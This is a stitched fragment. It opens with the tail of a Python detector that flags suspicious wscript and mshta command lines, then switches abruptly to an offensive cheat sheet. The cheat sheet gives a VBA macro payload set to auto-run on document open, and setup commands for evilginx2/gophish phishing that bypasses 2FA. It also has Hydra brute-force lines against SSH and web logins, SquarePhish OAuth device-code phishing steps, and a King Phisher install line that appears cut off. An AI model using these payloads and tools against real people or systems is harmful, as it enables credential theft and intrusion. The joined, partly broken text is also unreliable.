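        # /e: or //E: forces an engine, which lets a .txt file be run as VBScript.
        engine = [a for a in args if a.lower().startswith(("/e:", "//e:"))]
        if engine:
            findings.append(f"{exe} engine override {engine[0]}")
        for script in (a for a in args if not a.startswith("/")):
            name = _basename(script)
            ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
            if ext not in NORMAL_SCRIPT_EXT:
                findings.append(f"{exe} running non-script extension {ext or '(none)'}")
    elif exe == "mshta.exe" and args:
        # mshta has legitimate uses; surface it for triage rather than as a verdict.
        findings.append(f"mshta.exe launching {args[0]}")
    return findings


def triage(events):
    """Map each flagged command line to its findings."""
    return {e: f for e in events if (f := classify(e))}
```

The plain `wscript.exe payload.vbs` line is deliberately left unflagged: it shows why an extension allow-list alone misses the engine-override variant the tip describes.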
🔙VBA
Creating payload:
Sub calc()
Dim payload As String
payload = "calc.exe"
CreateObject("Wscript.Shell").Run payload,0
End Sub
Execute: rename the procedure to Auto_Open() so it runs when the macro-enabled document is opened
The Bash Bunny is a physical USB attack tool and multi-function payload delivery system. It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.
hackinglab: Bash Bunny – Guide
evilginx2 + gophish. Gophish is a powerful, open-source phishing framework that makes it easy to test your organization's exposure to phishing. evilginx2 is a standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies, allowing for the bypass of 2-factor authentication.
Install:
git clone https://github.com/fin3ss3g0d/evilgophish
Usage:
./setup <root domain> <subdomain(s)> <root domain bool> <redirect url> <feed bool> <rid replacement> <blacklist bool>
- root domain - the root domain to be used for the campaign
- subdomains - a space separated list of evilginx2 subdomains, can be one if only one
- root domain bool - true or false to proxy root domain to evilginx2
- redirect url - URL to redirect unauthorized Apache requests
- feed bool - true or false if you plan to use the live feed
- rid replacement - replace the gophish default "rid" in phishing URLs with this value
- blacklist bool - true or false to use Apache blacklist
Example:
./setup.sh example.com "accounts myaccount" false https://redirect.com/ true user_id false
This framework is great for creating campaigns for initial access: 'SET has a number of custom attack vectors that allow you to make a believable attack quickly'.
Install:
git clone https://github.com/IO1337/social-engineering-toolkit; cd social-engineering-toolkit; python setup.py install
Usage:
python3 setoolkit
Nice tool for logon brute-force attacks. It can brute-force a number of services, including SSH, FTP, TELNET and HTTP.
Install:
sudo apt install hydra
Usage:
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 http-post-form "login.php:username-^USER^&password=^PASS^:Error"
hydra -L USER.TXT -P PASS.TXT 1.1.1.1 ssh
SquarePhish is an advanced phishing tool that uses a technique combining OAuth Device code authentication flow and QR codes (See PhishInSuits for more about OAuth Device Code flow for phishing attacks).
Attack Steps:
- Send malicious QR code to victim
- Victim scans QR code with mobile device
- Victim directed to attacker controlled server (Triggering OAuth Device Code authentication flow process)
- Victim emailed MFA code (Triggering OAuth Device Code flow 15 minute timer)
- Attacker polls for authentication
- Victim enters code into legit Microsoft website
- Attacker saves authentication token
Install:
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt
Note: Before using either module, update the required information in the settings.config file noted with Required.
Usage (Email Module):
usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
-e EMAIL, --email EMAIL
victim email address to send initial QR code email to
Usage (Server Module):
usage: squish.py server [-h] [-c CONFIG] [--debug]
optional arguments:
-h, --help show this help message and exit
-c CONFIG, --config CONFIG
squarephish config file [Default: settings.config]
--debug enable server debugging
King Phisher is a tool that allows attackers to create and send phishing emails to victims to obtain sensitive information.
It includes features like customizable templates, campaign management, and email sending capabilities, making it a powerful and easy-to-use tool for carrying out phishing attacks. With King Phisher, attackers can target individuals or organizations with targeted and convincing phishing emails, increasing the chances of success in their attacks.
Install (Linux - Client & Server):
wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh && \
sudo bash